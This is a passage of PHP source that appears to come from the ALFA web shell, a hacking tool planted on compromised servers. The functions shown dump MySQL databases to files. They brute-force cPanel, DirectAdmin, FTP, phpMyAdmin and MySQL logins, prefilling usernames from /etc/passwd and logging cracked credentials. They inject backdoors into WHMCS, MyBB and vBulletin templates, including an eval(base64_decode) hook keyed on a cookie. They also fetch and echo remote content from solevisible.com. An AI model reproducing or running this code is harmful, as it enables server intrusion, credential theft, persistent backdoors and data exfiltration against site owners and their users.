2576}
2577function alfacoldumper(){
2578alfahead();
2579echo('<div class="header">');
2580AlfaNum(8,9,10);
2581echo "<center><br><div class='txtfont_header'>| Mysql Column Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"var opt_id=this.getAttribute('opt_id');var delimiter='json';try{if($('dumper-delimiter-type').value == 'delimiter')delimiter=$('dumper-delimiter-input').value}catch(e){};g('coldumper',null,delimiter,JSON.stringify(col_dumper_selected_data[opt_id]),this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); col_dumper_selected_data[opt_id] = {};return false;\"><p>";
2582$delimiter = (!empty($_POST['alfa1']) ? $_POST['alfa1'] : '::');
2583$selected_data = json_decode($_POST['alfa2'], true);
2584$username = ($_POST['alfa3']);
2585$password = ($_POST['alfa4']);
2586$dbname = ($_POST['alfa5']);
2587$dfile = ($_POST['alfa6']);
2588$host = ($_POST['alfa7']);
2589$table = array('td1' =>
2590 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => $host, 'inputSize' => '50'),
2591 'td2' =>
2592 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => $username, 'inputSize' => '50'),
2593 'td3' =>
2594 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => $password, 'inputSize' => '50'),
2595 'td4' =>
2596 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => $dbname, 'inputSize' => '50'),
2597 'td5' =>
2598 array('color' => 'FFFFFF', 'tdName' => 'Output Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']), 'inputSize' => '50')
2599);
2600create_table($table);
2601echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
2602$db = false;
2603if(!empty($dbname)){
2604 $db = @mysqli_connect($host, $username, $password, $dbname);
2605}
2606if(count($selected_data) > 0){
2607 if($db){
2608 if(!is_dir($dfile)){
2609 $dfile = $GLOBALS['cwd'];
2610 }
2611 $tbls = "";
2612 $ext = '.txt';
2613 if($delimiter == 'json'){
2614 $ext = '.json';
2615 }
2616 foreach ($selected_data as $tbl => $cols) {
2617 $tables_query = mysqli_query($db, "SELECT ".implode(',', $cols)." FROM $tbl");
2618 $file_name = $dfile.'/'.$dbname.'.'.$tbl.$ext;
2619 $fp = fopen($file_name, "w");
2620 $data = array();
2621 while($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){
2622 if($delimiter == "json"){
2623 $col_arr = array();
2624 foreach ($row as $key => $value) {
2625 if(empty($value)){
2626 $value = "[empty]";
2627 }
2628 $col_arr[$key] = $value;
2629 }
2630 $data[$tbl][] = $col_arr;
2631 }else{
2632 $data = "";
2633 foreach ($row as $key => $value) {
2634 if(empty($value)){
2635 $value = "[empty]";
2636 }
2637 $data .= $value . $delimiter;
2638 }
2639 fwrite($fp, $data ."\n");
2640 }
2641 }
2642 if($delimiter == "json"){
2643 fwrite($fp, json_encode($data));
2644 }
2645 fclose($fp);
2646 $tbls .= "Done ~~~> ".$file_name."<br>";
2647 }
2648 echo __pre();
2649 echo "<center><font color='#00FF00'>".$tbls."</font></center>";
2650 }
2651}
2652if(!empty($dbname) && count($selected_data) == 0){
2653//echo __pre();
2654if($db){
2655 echo("<hr><div style='text-align:center;margin-bottom:5px;font-weight:bolder;'><span>[ Select your tables and columns for dumping data ]</span></div>");
2656 echo("<div style='text-align:center;'><span>Output Type: </span><select id='dumper-delimiter-type' onchange='colDumplerSelectType(this);' name='output_type'><option value='delimiter' selected>delimiter</option><option value='json'>json</option></select><div id='coldumper-delimiter-input' style='display:inline;'><span> Delimiter: </span><input id='dumper-delimiter-input' style='text-align:center;' type='text' name='delimiter' placeholder='eg: ,'></div></div>");
2657 $data = array();
2658 $tables_query = mysqli_query($db, "SELECT table_name FROM information_schema.tables WHERE table_schema = database();");
2659 while($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){
2660 $data[$row["table_name"]] = array();
2661 $table_count_q = mysqli_query($db, "SELECT count(*) FROM `".$row['table_name']."`");
2662 $table_count = mysqli_fetch_row($table_count_q);
2663 $data[$row["table_name"]]["data_count"] = $table_count[0];
2664 $columns_query = mysqli_query($db, "SELECT column_name FROM information_schema.columns WHERE table_name = '".$row['table_name']."'");
2665 while($row2 = mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){
2666 $data[$row["table_name"]]["cols"][] = $row2["column_name"];
2667 }
2668 }
2669 mysqli_close($db);
2670
2671 echo '<ul id="myUL">';
2672 foreach($data as $tbl => $cols){
2673 echo '<li><span style="color:#00FF00;" class="box">'.$tbl.' ('.$cols["data_count"].')</span><ul class="nested">';
2674 foreach($cols["cols"] as $col){
2675 echo '<li tbl="'.$tbl.'"><span style="color:#00FF00;" tbl="'.$tbl.'" class="box sub-box">' . $col . '</span></li>';
2676 }
2677 echo '</ul></li>';
2678 }
2679 echo '</ul>';
2680}else{
2681echo('<center>mysqli_connect : Error!</center>');
2682}
2683}
2684echo('</div>');
2685alfafooter();
2686}
2687function alfaDumper(){
2688alfahead();
2689echo('<div class="header">');
2690AlfaNum(8,9,10);
2691echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\"><p>";
2692$table = array('td1' =>
2693 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
2694 'td2' =>
2695 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
2696 'td3' =>
2697 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
2698 'td4' =>
2699 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
2700 'td5' =>
2701 array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50')
2702);
2703create_table($table);
2704echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
2705$username = ($_POST['alfa3']);
2706$password = ($_POST['alfa4']);
2707$dbname = ($_POST['alfa5']);
2708$dfile = ($_POST['alfa6']);
2709$host = ($_POST['alfa7']);
2710if(!empty($dbname)){
2711echo __pre();
2712$msg = "<center>Check this : <font color='red'>".$dfile."</font></center>";
2713if(@mysqli_connect($host,$username,$password,$dbname)){
2714if(strlen(alfaEx("mysqldump"))>0){
2715alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '".addslashes($dfile)."'");
2716echo($msg);
2717}else{
2718__alert("Error...!");
2719}
2720}else{
2721echo('<center>mysqli_connect : Error!</center>');
2722}
2723}
2724echo('</div>');
2725alfafooter();
2726}
2727function Alfa_DirectAdmin_Cracker($info){
2728if(!$info['mysql'])
2729$url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
2730else $url = $info['protocol'].$info['target'].'/phpmyadmin';
2731$curl = curl_init();
2732curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
2733curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
2734curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
2735curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
2736curl_setopt($curl, CURLOPT_HEADER,0);
2737curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2738curl_setopt($curl, CURLOPT_URL,$url);
2739curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
2740if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
2741$result = @curl_exec($curl);
2742$curl_errno = curl_errno($curl);
2743$curl_error = curl_error($curl);
2744if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
2745elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){
2746echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2747$info['target'] = $url;
2748CrackerResualt($info);
2749}
2750curl_close($curl);
2751}
2752function Alfa_CP_Cracker($info){
2753$url = $info['protocol'].$info['target'].':'.$info['port'];
2754$curl = curl_init();
2755curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
2756curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
2757curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
2758curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
2759curl_setopt($curl, CURLOPT_HEADER,0);
2760curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
2761curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));
2762curl_setopt($curl, CURLOPT_URL, $url);
2763$result = @curl_exec($curl);
2764$curl_errno = curl_errno($curl);
2765$curl_error = curl_error($curl);
2766if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
2767elseif(preg_match('/filemanager/i',$result)){
2768echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2769$info['target'] = $url;
2770CrackerResualt($info);
2771}
2772curl_close($curl);
2773}
2774function Alfa_FTP_Cracker($info){
2775$url = $info['protocol'].$info['target'];
2776$curl = curl_init();
2777curl_setopt($curl, CURLOPT_URL, $url);
2778curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
2779curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2780curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");
2781$result = @curl_exec($curl);
2782$curl_errno = curl_errno($curl);
2783$curl_error = curl_error($curl);
2784if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
2785elseif(preg_match('/(\d+):(\d+)/i',$result)){
2786echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2787$info['target'] = $url;
2788CrackerResualt($info);
2789}
2790curl_close($curl);
2791}
2792function Alfa_Mysql_Cracker($info){
2793if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){
2794CrackerResualt($info);
2795echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2796}
2797}
2798function Alfa_FTPC($info){
2799if($con=@ftp_connect($info['target'],$info['port'])){
2800if($con){
2801$login=@ftp_login($con,$info['username'],$info['password']);
2802if($login){CrackerResualt($info);}}}
2803@ftp_close($con);
2804}
2805function CrackerResualt($info){
2806$res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;
2807$c = @fopen($info['fcrack'],'a+');
2808@fwrite($c, $res);
2809@fclose($c);
2810}
2811function Alfa_Call_Function_Cracker($method,$info){
2812switch($method){case 'cp':return Alfa_CP_Cracker($info);break;case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);break;case 'ftp':return Alfa_FTP_Cracker($info);break;case 'mysql':return Alfa_Mysql_Cracker($info);break;case 'mysql':return Alfa_FTPC($info);break;}
2813}
2814function alfaCrackers(){
2815alfahead();
2816AlfaNum(9,10);
2817echo '<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\'Crackers\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\'start\',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">';
2818foreach(array('cp'=>'Cpanel','direct'=>'DirectAdmin','ftp'=>'FTP','phpmyadmin'=>'PhpMyAdmin[DirectAdmin]','mysql'=>'mysql_connect()','ftpc'=>'ftp_connect()') as $key=>$val)echo('<option value="'.$key.'">'.$val.'</option>');
2819echo '</select> Protocol: <select id="protocol" name="protocol">';
2820foreach(array('https://','http://','ftp://') as $val)echo('<option value="'.$val.'">'.$val.'</option>');
2821echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
2822Port: <input id="port" type="text" name="port" value="2083">
2823<table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
2824<textarea placeholder="Users" rows="20" cols="25" name="usernames">'.($GLOBALS['sys']=='unix'?alfaEx("cut -d: -f1 /etc/passwd"):"").'</textarea>
2825  <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>
2826Save Result Into File <input type="text" name="fcrack" value="cracked.txt">
2827<p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
2828$target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);
2829$port = $_POST['alfa2'];
2830$usernames= $_POST['alfa3'];
2831$passwords = $_POST['alfa4'];
2832$fcrack = $_POST['alfa5'];
2833$cracking = $_POST['alfa6'];
2834$protocol = $_POST['alfa7'];
2835$loginpanel = $_POST['alfa8'];
2836$p = $loginpanel == 'phpmyadmin' ? $p = true : false;
2837if($cracking=='start'){
2838echo __pre();
2839$exuser = explode("\n",$usernames);
2840$expw = explode("\n",$passwords);
2841foreach($exuser as $user){
2842foreach($expw as $pw){
2843$array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);
2844Alfa_Call_Function_Cracker($loginpanel,$array);
2845}
2846}
2847echo '<br><font color="red">Attack Finished...</font>';
2848}
2849echo '</div>';
2850alfafooter();
2851}
2852function output($string){ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$string."'>Click Here !</a></font></b></center><br><br>";}
2853function alfaShellInjectors(){
2854alfahead();
2855echo '<div class=header>';
2856AlfaNum(11);
2857echo '<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,\'whmcs\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,\'mybb\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,null,\'vb\')">| vBulletin |</a></h3></center>';
2858$selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
2859if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){
2860AlfaNum();
2861echo __pre()."<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>".getConfigHtml('whmcs')."</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";
2862$table = array('td1' =>
2863 array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
2864 'td2' =>
2865 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
2866 'td3' =>
2867 array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
2868 'td4' =>
2869 array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
2870 'td5' =>
2871 array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
2872);
2873create_table($table);
2874echo $selector;
2875echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
2876if(isset($_POST['alfa6'])) {
2877$dbu = $_POST['alfa6'];
2878$dbn = $_POST['alfa7'];
2879$dbp = $_POST['alfa8'];
2880$dbh = $_POST['alfa9'];
2881$path = $_POST['alfa10'];
2882$method = $_POST['alfa4'];
2883$index = "{php}".ALFA_UPLOADER.";{/php}";
2884$newin = str_replace("'","\'",$index);
2885$newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";
2886if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){
2887if(filter_var($path,FILTER_VALIDATE_URL)){
2888$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_connect_error());
2889$soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
2890$soleGet = mysqli_fetch_assoc($soleSave);
2891$tempSave1 = $soleGet['message'];
2892$tempSave = str_replace("'","\'",$tempSave1);
2893mysqli_query($conn,"UPDATE tblconfiguration SET value = '1' WHERE setting = 'AllowSmartyPhpTags'") or die (mysqli_error($conn));
2894$inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";
2895$result = mysqli_query($conn,$inject) or die (mysqli_error($conn));
2896$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
2897$result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));
2898if(function_exists('curl_version') && $method == 'auto'){
2899$AlfaSole = new AlfaCURL(true);
2900$saveurl = $AlfaSole->Send($path."/pwreset.php");
2901$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
2902$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
2903$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
2904$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
2905__alert("shell injectet...");
2906$ff= 'http://'.$path."/solevisible.php";
2907output($ff);}else{
2908echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='".$path."/pwreset.php' target='_blank'>".$path."/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='".$path."/solevisible.php' target='_blank'>".$path."/solevisible.php</a></b></center><br><br>";}}else{__alert('Path is not Valid...');}}}
2909}if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){
2910AlfaNum(1,2,3,5);
2911echo __pre()."<p><div class='txtfont_header'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>
2912";
2913$table = array('td1' =>
2914 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
2915 'td2' =>
2916 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'),
2917 'td3' =>
2918 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'),
2919 'td4' =>
2920 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'),
2921 'td5' =>
2922 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')
2923);
2924create_table($table);
2925echo $selector;
2926echo "<p><input type=submit value=' '></p></form></center></center>";
2927if(isset($_POST['alfa6'])) {
2928$dbu = $_POST['alfa6'];
2929$dbn = $_POST['alfa7'];
2930$dbp = $_POST['alfa8'];
2931$dbh = $_POST['alfa9'];
2932$prefix = $_POST['alfa10'];
2933$method = $_POST['alfa4'];
2934$shellCode = "{\${".ALFA_UPLOADER."}}";
2935$newinshell = str_replace("'","\'",$shellCode);
2936if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){
2937$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
2938$inject = "select template from {$prefix}templates where title= 'calendar'";
2939$result = mysqli_query($conn, $inject) or die (mysqli_error($conn));
2940$GetTemp = mysqli_fetch_assoc($result);
2941$saveDate = $GetTemp['template'];
2942$repsave = str_replace($shellCode,"",$saveDate);
2943$repsave = str_replace("'","\'",$repsave);
2944$createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";
2945$result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));
2946$geturl = "select value from {$prefix}settings where name= 'bburl'";
2947$findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));
2948$rowb = mysqli_fetch_assoc($findurl);
2949$furl = $rowb['value'];
2950$realurl = parse_url($furl,PHP_URL_HOST);
2951$realpath = parse_url($furl,PHP_URL_PATH);
2952$res = false;
2953$AlfaCurl = new AlfaCURL();
2954if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){
2955if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
2956@fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");
2957@fputs($fsock, "HOST: $realurl\r\n");
2958@fputs($fsock, "Connection: close\r\n\r\n");
2959$check = fgets($fsock);
2960if(preg_match("/200 OK/i",$check)){
2961$repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";
2962$clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}
2963@fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){
2964$AlfaCurl->Send($realurl.$realpath."/calendar.php");
2965$res = true;
2966}
2967if($res){
2968$ff = 'http://'.$realurl.$realpath."/solevisible.php";
2969output($ff);
2970}else{
2971$ff = 'http://'.$realurl.$realpath."/calendar.php";
2972$fff = 'http://'.$realurl.$realpath."/solevisible.php";
2973echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color='#FFFFFF'>And Go To => </font><a href='".$fff."' target='_blank'>".$fff."</a></b></center><br><br>";
2974}}}}
2975if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){
2976AlfaNum(1,2,7,9,10);
2977echo __pre().'<p><div class="txtfont_header">| vbulletin |</div></p><p>'.getConfigHtml('vb').'</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';
2978$table = array('td1' =>
2979 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
2980 'td2' =>
2981 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'),
2982 'td3' =>
2983 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'),
2984 'td4' =>
2985 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'),
2986 'td5' =>
2987 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50')
2988);
2989create_table($table);
2990echo $selector;
2991echo '<p><input type="submit" value=" " /></p></form></center>';
2992if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){
2993$method = $_POST['alfa8'];
2994$faq_name = "faq";
2995$faq_file = "/faq.php";
2996$code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";
2997$conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_connect_error());
2998$rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";
2999$recivedata = @mysqli_query($conn,$rec);
3000$getd = @mysqli_fetch_assoc($recivedata);
3001$savetoass = $getd['template'];
3002if(empty($savetoass)){
3003 $faq_name = "header";
3004 $faq_file = "/";
3005 $rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";
3006 $recivedata = @mysqli_query($conn,$rec);
3007 $getd = @mysqli_fetch_assoc($recivedata);
3008 $savetoass = $getd['template'];
3009 $code = ALFA_UPLOADER.";";
3010}
3011$code = str_replace("'","\'",$code);
3012$p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='".$faq_name."'";
3013$ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));
3014$geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");
3015$getval = @mysqli_fetch_assoc($geturl);
3016$saveval = $getval['value'];
3017if($faq_name == "header"){
3018 if(substr($saveval, -5, 5) == "/core"){
3019 $saveval = substr($saveval, 0, -5);
3020 }
3021}
3022$realurl = parse_url($saveval,PHP_URL_HOST);
3023$realpath = parse_url($saveval,PHP_URL_PATH);
3024$res = false;
3025$AlfaCurl = new AlfaCURL();
3026if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){
3027if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
3028@fputs($fsock, "GET $realpath.$faq_file HTTP/1.1\r\n");
3029@fputs($fsock, "HOST: $realurl\r\n");
3030@fputs($fsock, "Connection: close\r\n\r\n");
3031$check = fgets($fsock);
3032if(preg_match("/200 OK/i",$check)){
3033$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn,$savetoass)."' WHERE title ='".$faq_name."'";
3034$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
3035$res = true;
3036}
3037@fclose($fsock);
3038}
3039}elseif(function_exists('curl_version') && $method == 'auto'){
3040$AlfaCurl->Send($realurl.$realpath.$faq_file);
3041$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn,$savetoass)."' WHERE title ='".$faq_name."'";
3042$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
3043$res = true;
3044}
3045if($res){
3046$ff = 'http://'.$realurl.$realpath."/solevisible.php";
3047output($ff);
3048}else{
3049$ff = 'http://'.$realurl.$realpath.$faq_file;
3050$fff = 'http://'.$realurl.$realpath."/solevisible.php";
3051echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='".$fff."' target='_blank'>".$fff."</a></center></p>";}}}
3052echo '</div>';
3053alfafooter();
3054}
3055function alfacheckfiletype(){
3056 $path = $_POST['path'];
3057 $arg = $_POST['arg'];
3058 if(@is_file($path.'/'.$arg)){
3059 echo("file");
3060 }else{
3061 echo("dir");
3062 }
3063}
3064function alfacheckupdate(){
3065 if($GLOBALS["DB_NAME"]["cgi_api"]){
3066 if(!isset($_COOKIE["alfacgiapi_mode"])&&!isset($_COOKIE["alfacgiapi"])){
3067 _alfa_cgicmd("whoami","perl",true);
3068 if(strlen(alfaEx("whoami",false,$cgi))>0){
3069 __alfa_set_cookie("alfa_canruncmd", "true");
3070 }
3071 }
3072 }
3073 if(!isset($_COOKIE['alfa_checkupdate'])){
3074 if(function_exists("curl_version")){
3075 $update = new AlfaCURL();
3076 $json = $update->Send("http://solevisible.com/update.json?ver=".__ALFA_VERSION__);
3077 $json = @json_decode($json,true);
3078 if($json){
3079 if(!empty($json["type"])){
3080 if($json["type"] == "update"){
3081 if(__ALFA_VERSION__ != $json['version'] || __ALFA_UPDATE__ != $json['version_number']){
3082 @setcookie("alfa_checkupdate", "1", time()+86400);
3083 echo('<div class="update-holder">'.$json["content"].'</div>');
3084 }
3085 }else{
3086 echo $json["content"];
3087 }
3088 }
3089 }
3090 }
3091 }
3092}
3093function alfaWriteTocgiapi($name, $source){
3094 $temp = "";
3095 $not_api = array("basedir.alfa", "getdir.alfa", "getheader.alfa");
3096 if(in_array($name, $not_api)){
3097 $temp = ALFA_TEMPDIR;
3098 if($temp){
3099 @chdir($temp);
3100 }
3101 }else{
3102 @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
3103 }
3104 @mkdir('alfacgiapi',0755);
3105 __write_file("alfacgiapi/".$name, __get_resource($source));
